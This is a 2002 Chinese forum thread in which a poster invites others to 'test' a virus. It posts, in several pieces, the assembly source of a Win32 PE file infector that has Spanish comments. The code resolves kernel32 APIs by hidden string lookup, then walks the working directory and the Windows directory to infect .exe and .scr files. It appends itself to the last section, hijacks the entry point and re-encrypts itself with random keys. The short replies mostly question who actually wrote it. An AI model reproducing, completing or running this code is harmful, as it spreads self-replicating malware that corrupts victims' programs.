一个奇怪的病毒。。。有胆测试者进

atm2001 2002-06-29 07:06:02
最近写了个程序希望有人测试一下
代码如下::
.586p
.MODEL FLAT, STDCALL

INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC

EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC

.CONST

PAGINAS EQU 50d
KERNEL_9X EQU 0BFF70000h
GPA_HARDCODE EQU 0BFF76DACh
CRLF EQU <0Dh, 0Ah>
TAMA_VIRUS EQU (TERMINA_VIRUS - EMPIEZA_VIRUS)
TAMA_ENCRIPTADO EQU (TERMINA_VIRUS - EMPIEZA_CRYPT)
TAMA_DESENCRIPTOR EQU (EMPIEZA_CRYPT - EMPIEZA_VIRUS)
RDTSC EQU <DW 310Fh>

.DATA

MENSJE DB "xxxxx", CRLF
DB "xxxxx", CRLF, CRLF
DB "xxxxxxxxxx "
DB TAMA_VIRUS / 10000 MOD 10 + 30h
DB TAMA_VIRUS / 1000 MOD 10 + 30h
DB TAMA_VIRUS / 100 MOD 10 + 30h
DB TAMA_VIRUS / 10 MOD 10 + 30h
DB TAMA_VIRUS / 1 MOD 10 + 30h
DB 00h
TITLO DB "-= SRX =-", 00h

.CODE

SRX:

XOR EBP, EBP
JMP EMPIEZA_CRYPT

EMPIEZA_VIRUS LABEL NEAR

CALL @LA_YUCA
@ER_DERTA:
SUB EDX, OFFSET @ER_DERTA
JMP @EL_MONTE
@LA_YUCA:
POP EDX
JMP @ER_DERTA
@EL_MONTE:
XCHG EDX, EBP

MOV AL, 00h
ORG $-1
LLAVEX DB 00h
MOV ECX, TAMA_ENCRIPTADO
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
@@DC:
ADD BYTE PTR [ESI], AL
INC ESI
DEC AL
LOOP @@DC

PUSH OFFSET EMPIEZA_CRYPT
ADD DWORD PTR [ESP], EBP
JMP @Decriptor_2

EMPIEZA_CRYPT LABEL NEAR

JMP @@1
DB " [ALMA] "
@@1:

CALL Desencriptar_Datos

MOV EDI, DWORD PTR [ESP]

CALL Seh_Handler

MOV ESP, DWORD PTR [ESP+8h]
JMP _REVOL

Seh_Handler:

XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP

CALL BUSCA_KERNEL32
MOV DWORD PTR [EBP + KERNEL32], EAX

CALL BUSCA_GPA
MOV DWORD PTR [EBP + GetProcAddress], EAX

LEA EDI, OFFSET [EBP + Tabla_APIs_KERNEL32]
LEA ESI, OFFSET [EBP + CreateFileA]
CALL BUSCA_APIs
INC EAX
JZ _REVOL

LEA EAX, OFFSET [EBP + DIR_ORIGINAL]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JZ _REVOL

Busca_Primero:

LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
LEA EAX, OFFSET [EBP + Todo]
PUSH EAX
CALL [EBP + FindFirstFileA]
MOV DWORD PTR [EBP + SHandle], EAX
INC EAX
JZ Recupera_Directorio
DEC EAX

LaMamada:

LEA EDI, OFFSET [EBP + Busqueda.wfd_szFileName]
XOR EAX, EAX
MOV AL, "."
@@Z:
SCASB
JNZ @@Z
MOV EAX, DWORD PTR [EDI-1h]
OR EAX, 20202020h
CMP EAX, "exe."
JE Infecta_Este_Exe
CMP EAX, "rcs."
JE Infecta_Este_Exe

Busca_Proximo:

LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindNextFileA]
OR EAX, EAX
JNZ LaMamada

PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindClose]

LEA EAX, OFFSET [EBP + Puto_Puto]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio

LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JE Termina_Directa
CMP DWORD PTR [EBP + Grueso], EAX
JE Termina_Directa
MOV DWORD PTR [EBP + Grueso], EAX

JMP Busca_Primero

Termina_Directa:

CMP BYTE PTR [EBP + WinDir_Infectado], TRUE
JZ Recupera_Directorio

MOV BYTE PTR [EBP + WinDir_Infectado], TRUE
PUSH MAX_PATH
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + GetWindowsDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio

LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]

JMP Busca_Primero

Recupera_Directorio:

LEA EAX, OFFSET [EBP + Dir_Original]
CALL [EBP + SetCurrentDirectoryA]

_REVOL:

XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP ECX

DB 068h ; PUSH
RETORNA DD OFFSET _PrimGen ; Primera Generacion
RET

Infecta_Este_Exe:
LEA EBX, OFFSET [EBP + Busqueda.wfd_szFileName]
CALL Infecta_Exe
JMP Busca_Proximo


daehappy 2002-07-07
up!gz!
Chice_wxg 2002-07-07


倒,我说怎么没看明白注释。


asciiman 2002-07-06
French
hehefaint 2002-07-05
者为兄弟痴迷于技术,把自幼学的德语(或者法语)记成英语了。可叹可叹
KomsBomb 2002-07-01
别蒙人了,有些符号明显不是英语而是欧洲语言。
真不知道你是何居心!!!!!
CodeDemon 2002-07-01
重地狱归来还是没有改变吹牛的习惯,哈哈
killhs 2002-07-01
!@#$%^&*()
拷回家慢慢看哟!!!
ckhitler 2002-07-01
你太厉害了,MUTATION ENGINE也是你写的吧?哈哈.........
ksaiy 2002-06-30
不会吧,这个代码我见过好几次了!

你要要我写的可以给你一个,我没有别的意思哦

我可以帮测试的

codez 2002-06-30
haha,收山这么久,又耐不住寂寞了?
atm2001 2002-06-30
习惯用英文作注释了,就没用中文。。。
wowocock 2002-06-29
能给写说明吗?比如利用什么原理,利用了哪些技术,你的代码太随意了,不好理解啊。
Hume 2002-06-29
是兄弟写的吗?怎么我看注释有些其他语言的痕迹?
zycat2002 2002-06-29
DB "(c) xxxxxxxxxxxxxxxx..."

DB 14d DUP (00h)

@Decriptor_2:

LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12

@DC2:
XOR DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2A DD 00000000h
ADD ESI, 04h
SUB DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2B DD 00000000h
ADD ESI, 04h
ADD DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2C DD 00000000h
ADD ESI, 04h
LOOP @DC2

RET

DB 12d DUP (90h)


TAMA_DEC2 EQU $-@Decriptor_2

TERMINA_VIRUS LABEL NEAR

_PrimGen:

XOR EAX, EAX
PUSH EAX
PUSH OFFSET Titlo
PUSH OFFSET Mensje
PUSH EAX
CALL MessageBoxA

PUSH 0
CALL ExitProcess

END SRX
zycat2002 2002-06-29
DB "L" XOR 4Eh
DB "o" XOR 4Eh
DB "a" XOR 4Eh
DB "d" XOR 4Eh
DB "L" XOR 4Eh
DB "i" XOR 4Eh
DB "b" XOR 4Eh
DB "r" XOR 4Eh
DB "a" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "t" XOR 4Eh
DB "u" XOR 4Eh
DB "a" XOR 4Eh
DB "l" XOR 4Eh
DB "A" XOR 4Eh
DB "l" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "c" XOR 4Eh
DB 4Eh

DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "t" XOR 4Eh
DB "u" XOR 4Eh
DB "a" XOR 4Eh
DB "l" XOR 4Eh
DB "F" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "T" XOR 4Eh
DB "i" XOR 4Eh
DB "c" XOR 4Eh
DB "k" XOR 4Eh
DB "C" XOR 4Eh
DB "o" XOR 4Eh
DB "u" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB 4Eh

DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "W" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "o" XOR 4Eh
DB "w" XOR 4Eh
DB "s" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB 0FFh XOR 4Eh ; HO HO HO

L_CRIPTA2 EQU $-CRIPTA2
zycat2002 2002-06-29
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "N" XOR 4Eh
DB "e" XOR 4Eh
DB "x" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "C" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "s" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "S" XOR 4Eh
DB "i" XOR 4Eh
DB "z" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "P" XOR 4Eh
DB "o" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "r" XOR 4Eh
DB 4Eh

DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "E" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "C" XOR 4Eh
DB "u" XOR 4Eh
DB "r" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "C" XOR 4Eh
DB "u" XOR 4Eh
DB "r" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "S" XOR 4Eh
DB "y" XOR 4Eh
DB "s" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "m" XOR 4Eh
DB "T" XOR 4Eh
DB "i" XOR 4Eh
DB "m" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
atm2001 2002-06-29
CRIPTA2 LABEL NEAR

Kernel32 DD 4E4E4E4Eh
GetProcAddress DD 4E4E4E4Eh
Puto_Puto DB "." XOR 4Eh
DB "." XOR 4Eh
DB 4Eh
Todo DB "*" XOR 4Eh
DB "." XOR 4Eh
DB "?" XOR 4Eh
DB "?" XOR 4Eh
DB "?" XOR 4Eh
DB 4Eh
SHandle DD 4E4E4E4Eh
Grueso DD 4E4E4E4Eh
Dir_Original DB MAX_PATH DUP (4Eh)
CreateFileA DD 4E4E4E4Eh
CreateFileMappingA DD 4E4E4E4Eh
MapViewOfFile DD 4E4E4E4Eh
UnmapViewOfFile DD 4E4E4E4Eh
CloseHandle DD 4E4E4E4Eh
FindFirstFileA DD 4E4E4E4Eh
FindNextFileA DD 4E4E4E4Eh
FindClose DD 4E4E4E4Eh
GetFileSize DD 4E4E4E4Eh
SetFilePointer DD 4E4E4E4Eh
SetEndOfFile DD 4E4E4E4Eh
GetCurrentDirectoryA DD 4E4E4E4Eh
SetCurrentDirectoryA DD 4E4E4E4Eh
GetSystemTime DD 4E4E4E4Eh
LoadLibraryA DD 4E4E4E4Eh
VirtualAlloc DD 4E4E4E4Eh
VirtualFree DD 4E4E4E4Eh
GetTickCount DD 4E4E4E4Eh
GetWindowsDirectoryA DD 4E4E4E4Eh
WinDir_Infectado DB 4Eh
MEMORIA DD 4E4E4E4Eh
FHANDLE DD 4E4E4E4Eh
MHANDLE DD 4E4E4E4Eh
BASEMAP DD 4E4E4E4Eh
TAMA DD 4E4E4E4Eh
SRAWDATA DD 4E4E4E4Eh
EP_VIEJO DD 4E4E4E4Eh
EXPORTS DD 4E4E4E4Eh
GPA DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "P" XOR 4Eh
DB "r" XOR 4Eh
DB "o" XOR 4Eh
DB "c" XOR 4Eh
DB "A" XOR 4Eh
DB "d" XOR 4Eh
DB "d" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "s" XOR 4Eh
DB "s" XOR 4Eh
DB 4Eh
Largo_GPA EQU $-GPA
Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (4Eh)

Tabla_APIs_KERNEL32 DB "C" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "a" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB "C" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "a" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "M" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "p" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "g" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh

DB "M" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "e" XOR 4Eh
DB "w" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "U" XOR 4Eh
DB "n" XOR 4Eh
DB "m" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "e" XOR 4Eh
DB "w" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "C" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "s" XOR 4Eh
DB "e" XOR 4Eh
DB "H" XOR 4Eh
DB "a" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh

DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "s" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
atm2001 2002-06-29
POPAD
RET

_ERROR_APIs:

XOR EAX, EAX
DEC EAX
RET

BUSCA_APIs ENDP

; Proceso para infectar un archivo PE.
; Expande la ultima secci del PE.
;
; EBX -> Puntero al archivo a infectar.

INFECTA_EXE PROC

PUSHAD

PUSH DWORD PTR [EBP + RETORNA]
POP DWORD PTR [EBP + EP_VIEJO]

XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
PUSH EBX
CALL [EBP + CreateFileA]
MOV DWORD PTR [EBP + FHANDLE], EAX
INC EAX
JZ _FIN_INFEXE
DEC EAX

XOR EBX, EBX
PUSH EBX
PUSH EAX
CALL [EBP + GetFileSize]
MOV DWORD PTR [EBP + TAMA], EAX
INC EAX
JZ _FIN_INFEXE
DEC EAX
ADD EAX, TAMA_VIRUS+1000h

PUSH EAX

XOR EBX, EBX
PUSH EBX
PUSH EAX
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + CreateFileMappingA]
MOV DWORD PTR [EBP + MHANDLE], EAX
OR EAX, EAX
JZ _FIN_INFEXE

POP EDX

XOR EBX, EBX
PUSH EDX
PUSH EBX
PUSH EBX
PUSH FILE_MAP_WRITE
PUSH EAX
CALL [EBP + MapViewOfFile]
MOV DWORD PTR [EBP + BASEMAP], EAX
OR EAX, EAX
JZ _TERMINADA

MOV EDI, EAX

MOV BX, WORD PTR [EDI]
XOR BX, 6666h
SUB BX, 3C2Bh ; "ZM" XOR 6666h & SUB
JNZ _TERMINADA

MOV EDX, EDI
ADD EDX, DWORD PTR [EDI+3Ch]
CMP EDX, DWORD PTR [EBP + BaseMap]
JB _TERMINADA
MOV EBX, DWORD PTR [EBP + BASEMAP]
ADD EBX, DWORD PTR [EBP + TAMA]
CMP EDX, EBX
JA _TERMINADA

ADD EDI, DWORD PTR [EDI+3Ch]
MOV BX, WORD PTR [EDI]
XOR BX, 2121h
SUB BX, 6471h ; "EP" XOR 6666h & SUB
JNZ _TERMINADA

CMP DWORD PTR [EDI+4Ch], "amlA" ; "Alma" marca de infeccion.
JZ _TERMINADA

MOV DWORD PTR [EDI+4Ch], "amlA"

MOV ESI, EDI
ADD ESI, 18h
MOVZX EAX, WORD PTR [EDI+14h]
ADD ESI, EAX

XOR ECX, ECX
MOVZX ECX, WORD PTR [EDI+06h]
DEC ECX
IMUL ECX, ECX, 28h ; ultima seccion
ADD ESI, ECX

PUSH DWORD PTR [ESI+10h]
POP DWORD PTR [EBP + SRAWDATA] ; sizeofrawdata.

MOV EAX, DWORD PTR [ESI+8h]
PUSH EAX
ADD EAX, TAMA_VIRUS ; ajustar
MOV DWORD PTR [ESI+8h], EAX

MOV EBX, DWORD PTR [EDI+3Ch] ; alignment.
XOR EDX, EDX
DIV EBX

INC EAX
MUL EBX

MOV DWORD PTR [ESI+10h], EAX

POP EBX

MOV EAX, DWORD PTR [EDI+28h]
ADD EAX, DWORD PTR [EDI+34h]
MOV DWORD PTR [EBP + RETORNA], EAX

ADD EBX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+28h], EBX

OR DWORD PTR [ESI+24h], 0A0000020h ; caracteristicas

MOV EAX, DWORD PTR [ESI+10h]
ADD EAX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+50h], EAX ; ImageSize.

; copiar virus...

MOV EDI, DWORD PTR [ESI+14h]
ADD EDI, DWORD PTR [ESI+8h]
PUSH TAMA_VIRUS
POP ECX
SUB EDI, ECX
ADD EDI, [EBP + BASEMAP]

PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH TAMA_VIRUS + 100h
PUSH NULL
CALL [EBP + VirtualAlloc]
MOV DWORD PTR [EBP + MEMORIA], EAX
OR EAX, EAX
JZ _TERMINADA

PUSHAD

MOV EDI, EAX
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12

RDTSC
IMUL EAX, EAX
NEG EAX
MOV DWORD PTR [EBP + LLAVE2A], EAX
PUSH EAX

RDTSC
ADC EAX, EAX
NOT EAX
MOV DWORD PTR [EBP + LLAVE2B], EAX
PUSH EAX

CALL [EBP + GetTickCount]
IMUL EAX, EAX
NOT EAX
MOV DWORD PTR [EBP + LLAVE2C], EAX
XCHG EDX, EAX

POP EBX
POP EAX

; LLAVE2A -> EAX
; LLAVE2B -> EBX
; LLAVE2C -> EDX

PUSHAD
CALL Desencriptar_Datos
POPAD

@JOJOJO:
MOVSD
MOVSD
MOVSD
XOR DWORD PTR [EDI-0Ch], EAX
ADD DWORD PTR [EDI-08h], EBX
SUB DWORD PTR [EDI-04h], EDX
LOOP @JOJOJO

PUSHAD
CALL Desencriptar_Datos
POPAD

PUSH TAMA_DEC2
POP ECX
REP MOVSB

POPAD

@ReGen:
RDTSC
IMUL EAX, EAX
MOV BYTE PTR [EBP + LLAVEX], AL
OR AL, AL
JZ @ReGen

LEA ESI, OFFSET [EBP + EMPIEZA_VIRUS]
PUSH TAMA_DESENCRIPTOR
POP ECX
REP MOVSB

MOV ESI, DWORD PTR [EBP + MEMORIA]
MOV ECX, TAMA_ENCRIPTADO

PUSHAD
CALL Desencriptar_Datos
POPAD

@@CC:
MOVSB
SUB BYTE PTR [EDI-1h], AL
DEC AL
LOOP @@CC

PUSHAD
CALL Desencriptar_Datos
POPAD

ADD DWORD PTR [EBP + TAMA], TAMA_VIRUS+1000h

_TERMINADA:

PUSH DWORD PTR [EBP + BASEMAP]
CALL [EBP + UnmapViewOfFile]

PUSH DWORD PTR [EBP + MHANDLE]
CALL [EBP + CloseHandle]

XOR EBX, EBX
PUSH EBX
PUSH EBX
MOV EAX, DWORD PTR [EBP + TAMA]
PUSH EAX
PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + SetFilePointer]

PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + SetEndOfFile]

PUSH DWORD PTR [EBP + FHANDLE]
CALL [EBP + CloseHandle]

_FIN_INFEXE:

PUSH DWORD PTR [EBP + EP_VIEJO]
POP DWORD PTR [EBP + RETORNA]

POPAD
RET

INFECTA_EXE ENDP
atm2001 2002-06-29

Mi_Firma DB "[" XOR 4Eh
DB "D" XOR 4Eh
DB "e" XOR 4Eh
DB "s" XOR 4Eh
DB "i" XOR 4Eh
DB "g" XOR 4Eh
DB "n" XOR 4Eh
DB "e" XOR 4Eh
DB "d" XOR 4Eh
DB " " XOR 4Eh
DB "b" XOR 4Eh
DB "y" XOR 4Eh
DB " " XOR 4Eh
DB "L" XOR 4Eh
DB "i" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "S" XOR 4Eh
DB "y" XOR 4Eh
DB "s" XOR 4Eh
DB "]" XOR 4Eh

; Proceso para buscar la base del KERNEL32
;
; EDI -> llamada del stack...

BUSCA_KERNEL32 PROC

AND EDI, 0FFFF0000h
PUSH PAGINAS
POP ECX

CHEQUEA:
PUSH EDI
CMP BYTE PTR [EDI], "M"
JNE SIGUE

ADD EDI, [EDI+3Ch]
CMP BYTE PTR [EDI], "P"
JE MESMO

SIGUE:
POP EDI
SUB EDI, 1000h
LOOP CHEQUEA

PUSH KERNEL_9X

MESMO:
POP EAX
RET

BUSCA_KERNEL32 ENDP

; Funcion para Encriptar/Desencriptar los datos.
; Llave estatica.

Desencriptar_Datos:

LEA EDI, OFFSET [EBP + CRIPTA2]
MOV ECX, L_CRIPTA2
@DCR:
XOR BYTE PTR [EDI], 4Eh
INC EDI
LOOP @DCR

RET

; Proceso para buscar el handle de GetProcAddress.
; Se debe buscar primero el handle del kernel32.

BUSCA_GPA PROC

MOV EBX, DWORD PTR [EBP + KERNEL32]
MOV ESI, EBX

ADD ESI, DWORD PTR [ESI+3Ch]
MOV ESI, DWORD PTR [ESI+78h]
ADD ESI, EBX ; Obtiene tabla de exportaciones.
MOV DWORD PTR [EBP + EXPORTS], ESI

MOV ECX, DWORD PTR [ESI+18h]
DEC ECX

MOV ESI, DWORD PTR [ESI+20h]
ADD ESI, EBX

XOR EAX, EAX

BUX:
MOV EDI, DWORD PTR [ESI]
ADD EDI, EBX
PUSH ESI

LEA ESI, OFFSET [EBP + GPA]

COMP:
PUSH ECX
PUSH Largo_GPA
POP ECX
REP CMPSB
JE GPA_LISTO

POP ECX
INC EAX
POP ESI
ADD ESI, 4h

LOOP BUX

JMP ASUME_HARDCODE

GPA_LISTO:

POP ESI
POP ECX

MOV EDI, DWORD PTR [EBP + EXPORTS]
ADD EAX, EAX

MOV ESI, DWORD PTR [EDI+24h]
ADD ESI, EBX
ADD ESI, EAX

MOVZX EAX, WORD PTR [ESI]
IMUL EAX, EAX, 4h

MOV ESI, DWORD PTR [EDI+1Ch]
ADD ESI, EBX
ADD ESI, EAX

MOV EAX, DWORD PTR [ESI]
ADD EAX, EBX

RET

ASUME_HARDCODE:

PUSH GPA_HARDCODE
POP EAX
RET

BUSCA_GPA ENDP

; Proceso para buscar el handle de cada una de las
; APIs.
;
; EBX -> Modulo.
; EDI -> Cadenas de las APIs.
; ESI -> DWords para guardar las rva.

BUSCA_APIs PROC

PUSHAD

B1:

PUSH EDI
PUSH EBX
CALL [EBP + GetProcAddress]
OR EAX, EAX
JZ _ERROR_APIs

MOV DWORD PTR [ESI], EAX
ADD ESI, 4h

XOR AL, AL
REPNZ SCASB
CMP BYTE PTR [EDI], 0FFh
JNZ B1
